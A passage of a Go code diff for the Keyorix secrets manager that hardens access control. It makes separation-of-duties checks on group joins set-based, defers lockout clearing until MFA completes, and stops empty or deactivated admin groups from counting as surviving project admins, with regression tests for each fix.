-	ms.On("VerifyAuditChain", mock.Anything).Return(&storage.AuditChainVerification{
+	ms.On("GetSystemMetadata", mock.Anything, auditRetentionAnchorKey).Return("", false, nil)
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(&storage.AuditChainVerification{
 		Valid:         true,
 		ChainedEvents: 3,
 		HeadID:        1,

--- a/internal/core/core_s29_test.go
+++ b/internal/core/core_s29_test.go
@@ -514,7 +514,7 @@ func TestAuditRetentionCoverage_Success(t *testing.T) {
 
 func TestVerifyAuditChain_StorageError(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("VerifyAuditChain", mock.Anything).Return(nil, errors.New("db error"))
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(nil, errors.New("db error"))
 	c := NewKeyorixCore(ms)
 	_, err := c.VerifyAuditChain(context.Background())
 	require.Error(t, err)
@@ -522,7 +522,7 @@ func TestVerifyAuditChain_StorageError(t *testing.T) {
 
 func TestVerifyAuditChain_Valid(t *testing.T) {
 	ms := new(MockStorage)
-	ms.On("VerifyAuditChain", mock.Anything).Return(&storage.AuditChainVerification{
+	ms.On("VerifyAuditChain", mock.Anything, mock.Anything).Return(&storage.AuditChainVerification{
 		Valid:         true,
 		ChainedEvents: 5,
 	}, nil)

--- a/internal/core/groups.go
+++ b/internal/core/groups.go
@@ -157,6 +157,14 @@ func (c *KeyorixCore) ListGroups(ctx context.Context) ([]*models.Group, error) {
 // validateGroupJoinRoles checks that actorID has the authority to grant all roles
 // the group already holds, and that userID would not gain a SoD-violating role
 // combination by joining (AUTHZ-007). Skips roles whose definition cannot be loaded.
+//
+// #G05: the SoD check is done ONCE, over the group's FULL role set
+// (requireGroupJoinNoSoDViolation), not per role inside the authority loop
+// below. A per-role check (each call only weighing ONE new role's permissions
+// against what the user held before the join) cannot see a violation that
+// only exists because two of the group's OWN roles combine with each other —
+// see requireGroupJoinNoSoDViolation's doc comment (sod.go) for the concrete
+// gap and how this mirrors requireGrantSetNoSoDViolation's set-based shape.
 func (c *KeyorixCore) validateGroupJoinRoles(ctx context.Context, actorID, userID, groupID uint) error {
 	grants, err := c.storage.ListGroupRoleAssignments(ctx, groupID)
 	if err != nil {
@@ -170,20 +178,18 @@ func (c *KeyorixCore) validateGroupJoinRoles(ctx context.Context, actorID, userI
 		if err := c.requireAuthorityForRole(ctx, actorID, g.ProjectID, role.Name); err != nil {
 			return err
 		}
-		if err := c.requireNoSoDViolation(ctx, userID, g.RoleID); err != nil {
-			return err
-		}
 	}
-	return nil
+	return c.requireGroupJoinNoSoDViolation(ctx, userID, grants)
 }
 
 func (c *KeyorixCore) AddUserToGroup(ctx context.Context, actorID, userID, groupID, projectID uint) error {
 	if userID == 0 || groupID == 0 {
 		return fmt.Errorf("%s: user ID and group ID are required", i18n.T("ErrorValidation", nil))
 	}
-	// #G04: validateGroupJoinRoles' per-role requireNoSoDViolation check and the
-	// membership write below must be treated as one step — see sodGrantMu's doc
-	// comment in service.go (AssignUserRole has the identical race).
+	// #G04: validateGroupJoinRoles' set-based requireGroupJoinNoSoDViolation check
+	// and the membership write below must be treated as one step — see
+	// sodGrantMu's doc comment in service.go (AssignUserRole has the identical
+	// race).
 	c.sodGrantMu.Lock()
 	defer c.sodGrantMu.Unlock()
 	if actorID != 0 {

--- a/internal/core/groups_join_sod_set_test.go
+++ b/internal/core/groups_join_sod_set_test.go
@@ -1,0 +1,140 @@
+package core_test
+
+// groups_join_sod_set_test.go — #G05 / findings-core/core-project-members.json#4:
+// validateGroupJoinRoles (groups.go) used to check a group's role grants ONE AT A
+// TIME via requireNoSoDViolation, each call comparing a single new role's
+// permissions against what the user held BEFORE the join. That per-role shape
+// structurally cannot catch a violation that only exists because two of the
+// GROUP'S OWN roles combine with each other — neither role's individual
+// permission set, checked in isolation, ever includes the other new role's
+// permissions in the same pass. Fixed by requireGroupJoinNoSoDViolation (sod.go),
+// which evaluates the group's FULL role set against the user's current holdings
+// in one pass, mirroring requireGrantSetNoSoDViolation's set-based shape.
+
+import (
+	"context"
+	"testing"
+
+	"github.com/keyorixhq/keyorix/internal/storage/models"
+	"github.com/keyorixhq/keyorix/internal/testhelper"
+	"github.com/stretchr/testify/assert"
+	"github.com/stretchr/testify/require"
+)
+
+// seedIsolatedRole creates a role that grants EXACTLY ONE permission (as
+// opposed to the shared fixture roles, e.g. "editor", which bundle several) so
+// a test can isolate whether a single role or a role COMBINATION is what
+// triggers an SoD policy.
+func seedIsolatedRole(t *testing.T, h *testhelper.RBACTestHelper, roleName, permName string, roleID uint) {
+	t.Helper()
+	h.CreateTestRole(t, roleName, "", roleID)
+	h.ExecuteRawSQL(t, `INSERT OR IGNORE INTO role_permissions (role_id, permission_id)
+		SELECT r.id, p.id FROM roles r, permissions p WHERE r.name = ? AND p.name = ?`, roleName, permName)
+}
+
+// TestAddUserToGroup_BlocksSoDViolationAcrossGroupRoleSet is the core
+// regression: the group itself grants TWO roles together (neither the user's
+// pre-existing holdings — there are none — nor either role alone completes the
+// policy), and only the COMBINATION does. The old per-role loop checked each
+// grant against the user's pre-join permissions independently and missed this
+// entirely; joining must now be refused.
+func TestAddUserToGroup_BlocksSoDViolationAcrossGroupRoleSet(t *testing.T) {
+	h := testhelper.NewRBACTestHelper(t)
+	defer h.Cleanup()
+	require.NoError(t, h.DB.AutoMigrate(&models.SoDPolicy{}, &models.AuditEvent{}))
+	ctx := context.Background()
+
+	seedIsolatedRole(t, h, "combo_read_only", "secrets.read", 70)
+	seedIsolatedRole(t, h, "combo_write_only", "secrets.write", 71)
+
+	h.CreateTestUser(t, "mallory", 70) // no pre-existing roles at all
+
+	h.CreateTestGroup(t, "combo-group", "", 50)
+	h.AssignGroupRole(t, 50, 70, nil) // combo_read_only
+	h.AssignGroupRole(t, 50, 71, nil) // combo_write_only — combined with the
+	// above, this is the toxic pair; neither role alone carries both sides.
+
+	_, err := h.CoreService.CreateSoDPolicy(ctx, 1, "read-vs-write", "", "secrets.read", "secrets.write")
+	require.NoError(t, err)
+
+	// actorID 71 is an arbitrary non-zero, non-privileged actor: neither
+	// combo_read_only nor combo_write_only is an admin-tier role name, so
+	// requireAuthorityForRole imposes no ceiling here — only the SoD gate under
+	// test is exercised.
+	err = h.CoreService.AddUserToGroup(ctx, 71, 70, 50, 0)
+	require.Error(t, err, "joining a group whose OWN role grants combine into a toxic pair must be refused")
+	assert.Contains(t, err.Error(), "separation-of-duties")
+
+	groups, gerr := h.Storage.GetUserGroups(ctx, 70)
+	require.NoError(t, gerr)
+	for _, g := range groups {
+		assert.NotEqual(t, uint(50), g.ID, "the blocked membership must not have been persisted")
+	}
+}
+
+// TestAddUserToGroup_BlocksSoDViolationWithExistingRole covers the scenario
+// named in the finding directly: a principal ALREADY holds role A (via a
+// direct grant), and the group grants a single new role B, where {A, B} is a
+// forbidden pair. This one is refused even under the old per-role check (its
+// single requireNoSoDViolation call already compared the new role against the
+// user's pre-join holdings correctly) — kept as an explicit non-regression
+// pin for the scenario the finding calls out, alongside the set-combination
+// gap above that the old code actually missed.
+func TestAddUserToGroup_BlocksSoDViolationWithExistingRole(t *testing.T) {
+	h := testhelper.NewRBACTestHelper(t)
+	defer h.Cleanup()
+	require.NoError(t, h.DB.AutoMigrate(&models.SoDPolicy{}, &models.AuditEvent{}))
+	ctx := context.Background()
+
+	seedIsolatedRole(t, h, "existing_read_only", "secrets.read", 72)
+	seedIsolatedRole(t, h, "existing_write_only", "secrets.write", 73)
+
+	h.CreateTestUser(t, "oscar", 72)
+	h.AssignUserRole(t, 72, 72, nil) // existing_read_only, held directly beforehand
+
+	h.CreateTestGroup(t, "existing-group", "", 51)
+	h.AssignGroupRole(t, 51, 73, nil) // existing_write_only
+
+	_, err := h.CoreService.CreateSoDPolicy(ctx, 1, "read-vs-write", "", "secrets.read", "secrets.write")
+	require.NoError(t, err)
+
+	err = h.CoreService.AddUserToGroup(ctx, 73, 72, 51, 0)
+	require.Error(t, err, "joining a group that grants a role completing a policy with an already-held role must be refused")
+	assert.Contains(t, err.Error(), "separation-of-duties")
+}
+
+// TestAddUserToGroup_AllowsNonViolatingGroupJoin is the negative control: a
+// group whose role grants do NOT combine (with each other or with anything
+// the user already holds) to complete any SoD policy must still let the user
+// join normally — the new set-based check must not be overbroad.
+func TestAddUserToGroup_AllowsNonViolatingGroupJoin(t *testing.T) {
+	h := testhelper.NewRBACTestHelper(t)
+	defer h.Cleanup()
+	require.NoError(t, h.DB.AutoMigrate(&models.SoDPolicy{}, &models.AuditEvent{}))
+	ctx := context.Background()
+
+	seedIsolatedRole(t, h, "safe_read_only", "secrets.read", 74)
+	seedIsolatedRole(t, h, "safe_other_only", "users.read", 75)
+
+	h.CreateTestUser(t, "peggy", 74)
+
+	h.CreateTestGroup(t, "safe-group", "", 52)
+	h.AssignGroupRole(t, 52, 74, nil) // safe_read_only
+	h.AssignGroupRole(t, 52, 75, nil) // safe_other_only — no policy pairs these
+
+	_, err := h.CoreService.CreateSoDPolicy(ctx, 1, "read-vs-write", "", "secrets.read", "secrets.write")
+	require.NoError(t, err)
+
+	err = h.CoreService.AddUserToGroup(ctx, 75, 74, 52, 0)
+	require.NoError(t, err, "a non-violating group join must succeed unimpeded")
+
+	groups, gerr := h.Storage.GetUserGroups(ctx, 74)
+	require.NoError(t, gerr)
+	var found bool
+	for _, g := range groups {
+		if g.ID == 52 {
+			found = true
+		}
+	}
+	assert.True(t, found, "the membership must have been persisted")
+}

--- a/internal/core/mfa_test.go
+++ b/internal/core/mfa_test.go
@@ -422,6 +422,103 @@ func TestVerifyMFALogin_FailedCodesFeedAccountLockout(t *testing.T) {
 	assert.Nil(t, sess)
 }
 
+// Regression test: a correct password against an MFA-enabled account is only
+// PARTIAL authentication — Login refuses to mint a session and returns
+// ErrMFARequired instead. Before the fix, VerifyPasswordCredentials cleared the
+// account's accumulated failed-login count/lockout state unconditionally as soon
+// as the password matched, regardless of whether a second factor was still
+// outstanding. That let an attacker who merely knows (or has guessed/leaked) a
+// victim's correct password — but does NOT have the second factor — repeatedly
+// submit it to reset the lockout counter back to zero before ever passing MFA,
+// defeating the counter as a brute-force backstop and even undoing a
+// defender-triggered lock. The clear must be deferred to the actual
+// full-authentication point (VerifyMFALogin, once the second factor also
+// succeeds) — see TestLogin_FullMFACompletionClearsLockout below.
+func TestLogin_PasswordOnlyDoesNotClearLockoutWhenMFARequired(t *testing.T) {
+	c, db, fixed := newMFATestCore(t)
+	c.loginLockout = LoginLockoutPolicy{Enabled: true, MaxAttempts: 5, Window: time.Hour, BaseCooldown: 15 * time.Minute, MaxCooldown: time.Hour}
+	ctx := context.Background()
+
+	_, secret, err := c.BeginMFAEnrollment(ctx, 1)
+	require.NoError(t, err)
+	actCode, err := totp.GenerateCode(secret, fixed)
+	require.NoError(t, err)
+	_, err = c.ActivateMFA(ctx, 1, actCode, mfaTestPassword)
+	require.NoError(t, err)
+
+	// Two prior failed password attempts (below the MaxAttempts=5 threshold) leave a
+	// non-zero failed-login count on the account, without tripping the lock.
+	user, err := c.storage.GetUser(ctx, 1)
+	require.NoError(t, err)
+	c.recordFailedLogin(ctx, user)
+	c.recordFailedLogin(ctx, user)
+	var before models.User
+	require.NoError(t, db.First(&before, 1).Error)
+	require.Equal(t, 2, before.FailedLoginAttempts, "test setup: two prior failures recorded")
+	require.Nil(t, before.LoginLockedUntil, "test setup: not yet locked")
+
+	// Correct password — but the account has MFA enabled, so Login must decline to
+	// mint a session and report ErrMFARequired instead.
+	session, u, err := c.Login(ctx, &LoginRequest{Username: "alice", Password: mfaTestPassword})
+	require.ErrorIs(t, err, ErrMFARequired)
+	assert.Nil(t, session)
+	require.NotNil(t, u)
+
+	var after models.User
+	require.NoError(t, db.First(&after, 1).Error)
+	assert.Equal(t, 2, after.FailedLoginAttempts,
+		"a correct password alone must NOT clear the lockout counter when MFA is still outstanding")
+}
+
+// Companion to the test above: once the SAME login sequence also completes the
+// second factor, THAT is the true full-authentication point, and the lockout
+// state must be cleared then.
+func TestLogin_FullMFACompletionClearsLockout(t *testing.T) {
+	c, db, fixed := newMFATestCore(t)
+	c.loginLockout = LoginLockoutPolicy{Enabled: true, MaxAttempts: 5, Window: time.Hour, BaseCooldown: 15 * time.Minute, MaxCooldown: time.Hour}
+	// A mutable clock: ActivateMFA below consumes (marks used) the TOTP step at
+	// `fixed`, so the later login-step code must be generated at a different step
+	// or it would be rejected as a replay of the activation code, not a genuine
+	// re-exercise of the login flow.
+	clock := fixed
+	c.now = func() time.Time { return clock }
+	ctx := context.Background()
+
+	_, secret, err := c.BeginMFAEnrollment(ctx, 1)
+	require.NoError(t, err)
+	actCode, err := totp.GenerateCode(secret, clock)
+	require.NoError(t, err)
+	_, err = c.ActivateMFA(ctx, 1, actCode, mfaTestPassword)
+	require.NoError(t, err)
+
+	user, err := c.storage.GetUser(ctx, 1)
+	require.NoError(t, err)
+	c.recordFailedLogin(ctx, user)
+	c.recordFailedLogin(ctx, user)
+	var before models.User
+	require.NoError(t, db.First(&before, 1).Error)
+	require.Equal(t, 2, before.FailedLoginAttempts, "test setup: two prior failures recorded")
+
+	_, u, err := c.Login(ctx, &LoginRequest{Username: "alice", Password: mfaTestPassword})
+	require.ErrorIs(t, err, ErrMFARequired)
+	require.NotNil(t, u)
+
+	clock = clock.Add(totpPeriod * time.Second) // advance one step past the activation code
+	code, err := totp.GenerateCode(secret, clock)
+	require.NoError(t, err)
+	ch, err := c.CreateMFAChallenge(ctx, u.ID)
+	require.NoError(t, err)
+	session, _, err := c.VerifyMFALogin(ctx, ch, code, "ua", "9.9.9.9")
+	require.NoError(t, err)
+	require.NotNil(t, session)
+
+	var after models.User
+	require.NoError(t, db.First(&after, 1).Error)
+	assert.Equal(t, 0, after.FailedLoginAttempts, "completing MFA fully authenticates and clears the lockout counter")
+	assert.Nil(t, after.LoginLockedUntil)
+	assert.Equal(t, 0, after.LoginLockoutCount)
+}
+
 // DisableMFA is an authenticated-session self-service endpoint: a stolen session
 // with no TOTP secret must not be able to brute-force the current code unbounded.
 // Repeated wrong codes must feed the same per-account lockout VerifyMFALogin uses,

--- a/internal/core/mock_storage_test.go
+++ b/internal/core/mock_storage_test.go
@@ -1265,8 +1265,8 @@ func (m *MockStorage) PrincipalSecretFirstSeen(ctx context.Context, since time.T
 	return args.Get(0).(map[string]map[uint]time.Time), args.Error(1)
 }
 
-func (m *MockStorage) MostAccessedSecrets(ctx context.Context, projectID *uint, since time.Time, limit int) ([]storage.SecretUsageStat, error) {
-	args := m.Called(ctx, projectID, since, limit)
+func (m *MockStorage) MostAccessedSecrets(ctx context.Context, projectID, environmentID *uint, since time.Time, limit int) ([]storage.SecretUsageStat, error) {
+	args := m.Called(ctx, projectID, environmentID, since, limit)
 	if args.Get(0) == nil {
 		return nil, args.Error(1)
 	}
@@ -1327,8 +1327,8 @@ func (m *MockStorage) SetSystemMetadata(ctx context.Context, key, value string) 
 	return args.Error(0)
 }
 
-func (m *MockStorage) UnusedSecrets(ctx context.Context, projectID *uint, notReadSince time.Time) ([]storage.UnusedSecretStat, error) {
-	args := m.Called(ctx, projectID, notReadSince)
+func (m *MockStorage) UnusedSecrets(ctx context.Context, projectID, environmentID *uint, notReadSince time.Time) ([]storage.UnusedSecretStat, error) {
+	args := m.Called(ctx, projectID, environmentID, notReadSince)
 	if args.Get(0) == nil {
 		return nil, args.Error(1)
 	}

--- a/internal/core/mock_storage_test.go
+++ b/internal/core/mock_storage_test.go
@@ -1281,13 +1281,17 @@ func (m *MockStorage) AuditRetentionStats(ctx context.Context) (*storage.AuditRe
 	return args.Get(0).(*storage.AuditRetentionStats), args.Error(1)
 }
 
-func (m *MockStorage) DeleteAuditLogsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
+func (m *MockStorage) DeleteAuditLogsBefore(ctx context.Context, cutoff time.Time) (int64, *storage.AuditChainAnchor, error) {
 	args := m.Called(ctx, cutoff)
-	return args.Get(0).(int64), args.Error(1)
+	var anchor *storage.AuditChainAnchor
+	if args.Get(1) != nil {
+		anchor = args.Get(1).(*storage.AuditChainAnchor)
+	}
+	return args.Get(0).(int64), anchor, args.Error(2)
 }
 
-func (m *MockStorage) VerifyAuditChain(ctx context.Context) (*storage.AuditChainVerification, error) {
-	args := m.Called(ctx)
+func (m *MockStorage) VerifyAuditChain(ctx context.Context, anchor *storage.AuditChainAnchor) (*storage.AuditChainVerification, error) {
+	args := m.Called(ctx, anchor)
 	if args.Get(0) == nil {
 		return nil, args.Error(1)
 	}

--- a/internal/core/project_hygiene.go
+++ b/internal/core/project_hygiene.go
@@ -54,7 +54,7 @@ func (c *KeyorixCore) ProjectHygieneSummary(ctx context.Context, projectID uint,
 	}
 	out.OrphanedSecrets = len(orphaned)
 
-	unused, err := c.UnusedSecrets(ctx, &projectID, unusedDays)
+	unused, err := c.UnusedSecrets(ctx, &projectID, nil, unusedDays)
 	if err != nil {
 		return nil, fmt.Errorf("unused secrets: %w", err)
 	}

--- a/internal/core/project_members.go
+++ b/internal/core/project_members.go
@@ -159,7 +159,17 @@ func (c *KeyorixCore) RemoveProjectMember(ctx context.Context, actorID, projectI
 // project's membership either — it doesn't count as a survivor. Passing a
 // nil/roles.assign-free targetRoleIDsBefore is a fast no-op (the target wasn't
 // an admin to begin with).
-func (c *KeyorixCore) guardLastProjectAdmin(ctx context.Context, projectID, targetID uint, targetRoleIDsBefore, targetRoleIDsAfter []uint) error { // NOSONAR -- cognitive complexity 18, suppress go:S3776
+//
+// Uses resolveProjectAdminHolders (the project-scope counterpart of
+// resolveGlobalAdminHolders, #G05) to expand a surviving group grant to its
+// LIVE members before counting it as a survivor — NOT the previous per-row
+// scan, which treated ANY project-level roles.assign-granting group ASSIGNMENT
+// as "another admin survives" without checking whether the group actually had
+// any live members. A group that's empty, whose every member was deactivated,
+// or that was itself soft-deleted therefore never covers the project, even
+// though its group_roles grant row (pre-fix: even its soft-deleted self) still
+// existed.
+func (c *KeyorixCore) guardLastProjectAdmin(ctx context.Context, projectID, targetID uint, targetRoleIDsBefore, targetRoleIDsAfter []uint) error {
 	hadAssign, err := c.storage.RoleSetHasPermission(ctx, targetRoleIDsBefore, permRolesAssign)
 	if err != nil {
 		return err
@@ -178,27 +188,60 @@ func (c *KeyorixCore) guardLastProjectAdmin(ctx context.Context, projectID, targ
 	if err != nil {
 		return fmt.Errorf("failed to check project administrators: %w", err)
 	}
+	holders, err := c.resolveProjectAdminHolders(ctx, targetID, assignments)
+	if err != nil {
+		return fmt.Errorf("failed to check project administrators: %w", err)
+	}
+	if len(holders) > 0 {
+		return nil // another admin (user or group, live members only) survives the change
+	}
+	return fmt.Errorf("cannot remove or demote the project's last administrator; assign another project admin first")
+}
+
+// resolveProjectAdminHolders is guardLastProjectAdmin's project-scope
+// counterpart of resolveGlobalAdminHolders (internal/core/authz.go, #G03):
+// it expands the project-level (environment_id = 0) assignments in
+// `assignments` that carry roles.assign into the set of user IDs who would
+// actually survive as project admins after targetID's change — group grants
+// are expanded to their LIVE members via resolveGroupAdminMembers (a
+// soft-deleted group's assignment row is already excluded upstream by
+// ListProjectRoleAssignments, but an undeleted, empty, or fully-deactivated
+// group must also not count), and filterActiveHolders drops any holder
+// (direct or group-derived) who is themselves deactivated or soft-deleted.
+// targetID is excluded both as a direct grant holder and as a group member —
+// a grant belonging to the target themselves doesn't count as "another"
+// admin. `assignments` is assumed already scoped to a single project (the
+// caller's ListProjectRoleAssignments(ctx, projectID) result).
+func (c *KeyorixCore) resolveProjectAdminHolders(ctx context.Context, targetID uint, assignments []storage.RoleAssignment) (map[uint]bool, error) {
+	holders := make(map[uint]bool)
 	checked := make(map[uint]bool, len(assignments))
 	for _, a := range assignments {
 		if a.EnvironmentID != 0 {
 			continue // not project-level; can't administer /projects/{id}/members
 		}
-		// A grant belonging to the target themselves doesn't count as "another"
-		// admin — only groups and other users can pick up the slack.
-		if a.PrincipalType == "user" && a.PrincipalID == targetID {
-			continue
-		}
 		hasAssign, ok := checked[a.RoleID]
 		if !ok {
+			var err error
 			hasAssign, err = c.storage.RoleSetHasPermission(ctx, []uint{a.RoleID}, permRolesAssign)
 			if err != nil {
-				return err
+				return nil, err
 			}
 			checked[a.RoleID] = hasAssign
 		}
-		if hasAssign {
-			return nil // another admin (user or group) survives the change
+		if !hasAssign {
+			continue
+		}
+		switch a.PrincipalType {
+		case "user":
+			if a.PrincipalID == targetID {
+				continue
+			}
+			holders[a.PrincipalID] = true
+		case "group":
+			if err := c.resolveGroupAdminMembers(ctx, a.PrincipalID, func(_, userID uint) bool { return userID == targetID }, holders); err != nil {
+				return nil, err
+			}
 		}
 	}
-	return fmt.Errorf("cannot remove or demote the project's last administrator; assign another project admin first")
+	return c.filterActiveHolders(ctx, holders)
 }

--- a/internal/core/project_members_test.go
+++ b/internal/core/project_members_test.go
@@ -384,3 +384,176 @@ func TestRemoveProjectMember_NonAdminAlwaysRemovable(t *testing.T) {
 	require.NoError(t, err)
 	assert.Empty(t, members)
 }
+
+// #G05: guardLastProjectAdmin previously treated ANY project-level group grant
+// carrying roles.assign as a surviving admin, without expanding the group to its
+// LIVE members — so a project-admin-granting group with zero live members (empty,
+// all members deactivated, or the group itself soft-deleted) incorrectly "covered"
+// the project, letting the actual last human admin be removed/demoted and leaving
+// the project with zero functional admins. These mirror last_admin_guard_wiring_test.go's
+// guardLastAdminDeactivation/resolveGlobalAdminHolders coverage, at project scope.
+
+// Negative case 1: the admin-granting group exists and has the right role, but has
+// NO members at all.
+func TestRemoveProjectMember_RefusesLastAdmin_EmptyAdminGroup(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "ivan", Email: "ivan@example.com", IsActive: true})
+	require.NoError(t, err)
+	require.NoError(t, c.AddProjectMember(ctx, actor, proj, u.ID, "project_admin"))
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "empty-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	// No members ever added to the group.
+
+	err = c.RemoveProjectMember(ctx, actor, proj, u.ID)
+	require.Error(t, err, "an admin group with zero live members must not count as a surviving admin")
+	assert.Contains(t, err.Error(), "last administrator")
+
+	members, err := c.ListProjectMembers(ctx, proj)
+	require.NoError(t, err)
+	require.Len(t, members, 1, "the membership must not have been removed when the guard refuses")
+}
+
+// Negative case 2: the admin-granting group has a member, but that member is
+// deactivated (IsActive=false) — not usable as a fallback admin.
+func TestRemoveProjectMember_RefusesLastAdmin_AllGroupMembersDeactivated(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "judy", Email: "judy@example.com", IsActive: true})
+	require.NoError(t, err)
+	require.NoError(t, c.AddProjectMember(ctx, actor, proj, u.ID, "project_admin"))
+
+	// Created active, then explicitly deactivated via UpdateUser: models.User.IsActive
+	// has a `gorm:"default:true"` tag, so GORM treats an explicit IsActive:false on
+	// Create as the field's zero value and lets the DB default (true) win — the only
+	// reliable way to persist IsActive:false is a subsequent update.
+	inactive, err := st.CreateUser(ctx, &models.User{Username: "mallory", Email: "mallory@example.com", IsActive: true})
+	require.NoError(t, err)
+	no := false
+	_, err = c.UpdateUser(ctx, &UpdateUserRequest{ID: inactive.ID, IsActive: &no})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "deactivated-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, st.AddUserToGroup(ctx, inactive.ID, group.ID, 0))
+
+	err = c.RemoveProjectMember(ctx, actor, proj, u.ID)
+	require.Error(t, err, "an admin group whose only member is deactivated must not count as a surviving admin")
+	assert.Contains(t, err.Error(), "last administrator")
+
+	members, err := c.ListProjectMembers(ctx, proj)
+	require.NoError(t, err)
+	require.Len(t, members, 1, "the membership must not have been removed when the guard refuses")
+}
+
+// Negative case 3: the admin-granting group has a live member, but the group
+// itself has been soft-deleted — its GroupRole assignment row survives the
+// soft-delete (DeleteGroup only marks the group deleted, it doesn't remove the
+// grant/membership rows), but a soft-deleted group confers no authority.
+func TestRemoveProjectMember_RefusesLastAdmin_SoftDeletedAdminGroup(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "karl", Email: "karl@example.com", IsActive: true})
+	require.NoError(t, err)
+	require.NoError(t, c.AddProjectMember(ctx, actor, proj, u.ID, "project_admin"))
+
+	member, err := st.CreateUser(ctx, &models.User{Username: "leo", Email: "leo@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "soon-deleted-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, st.AddUserToGroup(ctx, member.ID, group.ID, 0))
+	require.NoError(t, st.DeleteGroup(ctx, group.ID)) // soft-delete; grant/membership rows survive
+
+	err = c.RemoveProjectMember(ctx, actor, proj, u.ID)
+	require.Error(t, err, "a soft-deleted admin group must not count as a surviving admin even with a live member")
+	assert.Contains(t, err.Error(), "last administrator")
+
+	members, err := c.ListProjectMembers(ctx, proj)
+	require.NoError(t, err)
+	require.Len(t, members, 1, "the membership must not have been removed when the guard refuses")
+}
+
+// Positive case: an admin-granting group WITH a live member correctly counts as
+// a surviving admin, so removing the human admin is allowed — the guard must not
+// over-block once the group actually has someone who can administer the project.
+func TestRemoveProjectMember_AllowsRemoval_WhenAdminGroupHasLiveMember(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "mike", Email: "mike@example.com", IsActive: true})
+	require.NoError(t, err)
+	require.NoError(t, c.AddProjectMember(ctx, actor, proj, u.ID, "project_admin"))
+
+	member, err := st.CreateUser(ctx, &models.User{Username: "nancy", Email: "nancy@example.com", IsActive: true})
+	require.NoError(t, err)
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "live-admins"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+	require.NoError(t, st.AddUserToGroup(ctx, member.ID, group.ID, 0))
+
+	require.NoError(t, c.RemoveProjectMember(ctx, actor, proj, u.ID),
+		"a group with a live member covers the project, so removing the human admin must succeed")
+
+	members, err := c.ListProjectMembers(ctx, proj)
+	require.NoError(t, err)
+	assert.Empty(t, members, "the human admin's own project-level membership row is gone")
+}
+
+// Same empty-admin-group negative case, but through SetProjectMemberRole's
+// demotion path — a second entry point into the same guardLastProjectAdmin call
+// that must not be bypassable either (mirrors TestSetProjectMemberRole_RefusesLastAdminDemotion).
+func TestSetProjectMemberRole_RefusesLastAdminDemotion_EmptyAdminGroup(t *testing.T) {
+	c, st := newBootstrappedCore(t)
+	ctx := context.Background()
+	const proj = uint(7)
+	const actor = uint(55)
+	grantGlobalAdmin(t, st, actor)
+
+	u, err := st.CreateUser(ctx, &models.User{Username: "oscar", Email: "oscar@example.com", IsActive: true})
+	require.NoError(t, err)
+	require.NoError(t, c.AddProjectMember(ctx, actor, proj, u.ID, "project_admin"))
+
+	adminRole, err := st.GetRoleByName(ctx, "project_admin")
+	require.NoError(t, err)
+	group, err := st.CreateGroup(ctx, &models.Group{Name: "empty-admins-2"})
+	require.NoError(t, err)
+	require.NoError(t, st.AssignRoleToGroup(ctx, group.ID, adminRole.ID, storage.Scope{ProjectID: proj}))
+
+	err = c.SetProjectMemberRole(ctx, actor, proj, u.ID, "project_viewer")
+	require.Error(t, err, "an admin group with zero live members must not count as a surviving admin")
+	assert.Contains(t, err.Error(), "last administrator")
+
+	members, err := c.ListProjectMembers(ctx, proj)
+	require.NoError(t, err)
+	require.Len(t, members, 1)
+	assert.Equal(t, "project_admin", members[0].RoleName, "role must be unchanged after a refused demotion")
+}

--- a/internal/core/rotation_policies.go
+++ b/internal/core/rotation_policies.go
@@ -68,11 +68,32 @@ func (c *KeyorixCore) CreateRotationPolicy(ctx context.Context, actorID uint, re
 		return nil, err
 	}
 
+	// When an environment is given, resolve its true owning project and use that
+	// to populate/validate ProjectID — never trust a caller-supplied ProjectID on
+	// its own. Without this, a policy could be created (or, historically, an
+	// environment-scoped policy's ProjectID could be left nil) with a
+	// ProjectID/EnvironmentID pair that don't actually belong together;
+	// scopedPolicySecrets then resolves the policy's secret scope from these two
+	// fields, so a mismatched or missing ProjectID lets an environment-scoped
+	// policy's secret lookup drift onto (or span) a different project entirely.
+	// Mirrors CreateFolder's parent.ProjectID != projectID consistency check.
+	effectiveProjectID := req.ProjectID
+	if req.EnvironmentID != nil {
+		env, err := c.storage.GetEnvironment(ctx, *req.EnvironmentID)
+		if err != nil {
